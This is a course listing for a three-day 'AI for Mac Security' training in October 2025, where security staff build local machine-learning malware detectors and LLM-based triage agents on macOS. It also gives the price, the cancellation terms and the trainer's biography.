
AI for Mac Security
A hands-on introduction to building native machine-learning models and AI tools to protect macOS.
Training overview
Mac security is evolving fast—and Apple Silicon opens the door to native machine learning like never before. This three-day, hands-on course gives security professionals the skills to build and deploy fast, local ML models directly on their MacBooks.Designed for beginners and intermediate practitioners, the course requires only a basic understanding of scripting and threat hunting. No prior machine learning experience is needed.You’ll apply both traditional ML techniques and large language models (LLMs) to real-world macOS challenges, from classifying malware to detecting suspicious command-line activity. Along the way, you’ll optimize performance for Apple Silicon and integrate your models into native tooling across the macOS ecosystem.

When
October 12-14, 2025
Details
Day 1 – Foundation and Malware Detection
We start by setting up your Mac with the core tools needed for machine learning and macOS binary analysis. With your environment ready, you’ll explore how Mac applications are structured and how to extract meaningful features from them.From there, we shift into building a labeled dataset. You’ll gather real-world malware samples, clean and organize your data, and prepare it for training. Through hands-on labs, you’ll gain practical experience working with binary data and applying supervised machine learning to detect malicious files.By the end of the day, you’ll have trained your first detection model and learned how to evaluate its performance using metrics that matter.
Day 2 – Code Behavior and Endpoint Visibility
Day 2 pushes deeper into feature engineering by examining what software actually does. You’ll extract behavioral signals from Mac binaries and use them to train more expressive machine learning models. With hands-on guidance, you’ll convert your models to run locally using Apple’s Core ML format and test their performance on Apple Silicon.In the afternoon, the focus shifts to live system activity. You’ll work with macOS process data using the Endpoint Security Framework, capturing how applications behave at runtime. You’ll clean and prepare real-world command histories for analysis and apply unsupervised techniques to spot unusual patterns across users and systems.
Day 3 – Language Models and Security Agents
Day 3 introduces large language models as a new lens for understanding command-line and process activity. You’ll start with the fundamentals: how LLMs work, how to run them locally, and how to shape their output through prompt engineering.Next, you’ll build a semantic detector that uses a GPT-style model to flag suspicious or malicious behavior based on process context. Instead of relying on signatures or patterns, this approach evaluates intent and meaning.In the final module, you’ll extend that detector into a team of lightweight security agents. These agents help you triage alerts, investigate related activity, and perform threat research, all using natural language interfaces. You’ll leave with a powerful new workflow that blends automation with human insight.
Cost
$2,000
Cost does not include a conference ticket. Please also register here!
Cancellation:
Cancellations up to a month before the training (Sept. 12the 2025), will be 100% refunded (minus any payment processing fees).
Cancellations less than a month before will be refunded at half rate (minus any payment processing fees).
About the trainer
Dr. Kimo Bumanglag is a Member of Technical Staff at OpenAI focused on threat hunting and intelligence.He also serves as an adjunct lecturer at Johns Hopkins University, where he’s committed to making complex cybersecurity topics accessible and mentoring the next generation of security professionals. In addition, he spent years training people for the NSA, US Marine Corps, and US Air Force in offensive and defensive cyber operations.
© All rights reserved.